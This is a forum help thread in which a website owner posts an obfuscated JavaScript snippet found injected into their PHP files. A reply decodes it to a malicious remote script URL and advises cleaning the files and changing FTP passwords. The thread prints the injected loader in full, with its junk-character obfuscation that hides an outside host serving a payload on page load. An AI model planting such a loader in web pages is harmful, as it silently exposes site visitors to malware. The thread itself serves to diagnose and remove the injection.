I found the following code in PHP files in my website. I think someone just able to hack my ftp or with some way he’s able to add this script in my PHP files, don’t know how.
<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->
But I want to know the meaning of above code, I suppose it is encrypted in HTML format or in some other form, but what the above code is actually doing and how someone able to inject it in my website??
Thanks.
The above script src results in the address
http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/It got into your files either via a security hole in your web site / scripts or directly via ftp.
Make sure to clean your files from this malicious code as soon as possible, change your ftp passwords and fix your security flaws!